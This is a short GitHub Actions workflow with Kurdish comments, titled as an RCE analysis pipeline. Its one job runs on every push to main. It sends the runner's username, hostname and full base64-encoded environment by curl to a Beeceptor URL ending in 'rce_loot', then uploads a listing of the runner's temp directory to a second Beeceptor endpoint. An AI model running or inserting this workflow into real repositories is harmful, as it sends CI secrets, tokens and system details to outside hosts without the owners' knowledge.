name: RCE Analysis Pipeline

on:
  push:
    branches:
      - main  # یان هەر branchـێکی تری خۆت
  workflow_dispatch: # ئەمە ڕێگەت پێ دەدات بە دەستی (Manually) لە سایتەکەوە ڕەنی بکەیت

jobs:
  exploit_test:
    runs-on: ubuntu-latest
    steps:
      - name: System Information Gathering
        run: |
          # فەرمانەکانی RCE لێرەدا دەچن
          echo "Scanning for RCE vulnerabilities..."
          
          # ناردنی زانیاری سێرڤەر بۆ Beeceptor
          curl -X POST -d "user=$(whoami)&hostname=$(hostname)&env=$(env | base64)" https://ccssxa.free.beeceptor.com/rce_loot
          
          # تاقیکردنەوەی دەستڕاگەیشتن بە فایلەکان
          ls -la /home/runner/work/_temp/ >> result.txt
          curl -F "file=@result.txt" https://aksjwuwu.free.beeceptor.com/rce_loot
